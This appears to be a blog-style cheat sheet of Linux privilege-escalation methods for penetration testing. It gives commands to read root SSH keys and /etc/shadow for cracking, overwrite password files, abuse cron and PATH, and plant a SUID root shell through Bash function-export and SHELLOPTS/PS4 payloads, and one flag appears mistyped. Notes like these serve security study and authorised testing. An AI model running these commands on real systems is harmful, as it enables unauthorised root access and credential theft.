---
title: Linux Privilege Escalation
author: Devin Cudnohufsky
date: 2021-05-18 00:00:00 +0500
categories: [Techniques]
tags: []
---

## Tools

1. [LinPEAS](https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite)
1. Linux-exploit-suggester-2.pl

## User

1. `id`
1. `whoami`

## Services

What programs are running as root?
    - `ps aux | grep "^root"`
Are any passwords exposed?
If so, are the passwords re-used by any user accounts?

What version is running?
    - `<program> -v`
	- `dpkg -l | grep <program>`
    - `rpm -qa | grep <program>`

## Sudo

`sudo -l` to list sudoable commands

`sudo su -` alternatives if it is blocked
    - `sudo -s`
    - `sudo -i`
    - `sudo /bin/bash`
    - `sudo passwd`

Read restricted shell escapes technique.

### Sudo Command Abuse

Force an error in the config of a sudoable command. e.g. Run apache as root, but give it /etc/shadow and it will print out the first line because uid 0 has read permissions.

## Cron Jobs

### File Permissions

If you can write to, replace, or add cron jobs, they will be run with the permissions of that user

### Change the PATH variable

If you can abuse a path variable in a cron job, you can change which binaries get run

### Wildcards

If a cron has a `*`, it will glob filenames. You can pass flags via filenames e.g. `-i=/root/.ssh/id_rsa`

## Weak File Permissions

### Stored Credentials

Backup files or configuration files that store credentials that you can read.

### Readable SSH Key

`/root/.ssh/id_rsa`

### Readable /etc/shadow

Grab root hash and attempt to crack

### Writeable /etc/shadow

Generate a new password hash with:
    - `mkpasswd -m sha-512 <password>`

### Writeable /etc/passwd

You can put a password in field 2 and it will take precedence over `/etc/shadow`. 'x' says to look in /etc/shadow, but no password can mean you are able to su with a blank password. `openssl passwd '<password>'`

### Readable /etc/passwd

You probably wont find a password in the second field in here

## SUID/SGID Programs

`find / -type f -a \( -perm -u+s -o -perm -g+s \) -exec ls -l {} \; 2> /dev/null`

### Shared Object Files

`strace <suid/guid executable> 2>&1 | grep -iE "open|access|no such file"`

### PATH Abuse

For example an SUID file runs `service httpd start`, you can create a binary in your home directory called service and add your home directory to the PATH.

### Bash (4.2.8 or less)

1. `function /usr/sbin/service { /bin/bash -p; }`
1. `export -f /usr/sbin/service`
1. Run suid command that has service command

### Bash (4.4 or less)

1. `env -I SHELLOPTS=xtrace PS4='$(cp /bin/bash /tmp/rootbash; chmod +s /tmp/rootbash)' <suid program>`
1. `/tmp/rootbash -p`

## NFS

Check for no_root_squash, if it exists, you can mount the share on a machine you have root on and create SUID executables for escalation.

## Kernel

> Use only as a last resort

1. `uname -a`

1. Search for exploits on
    1. Google
    1. ExploitDB
    1. GitHub
1. Compile
1. Run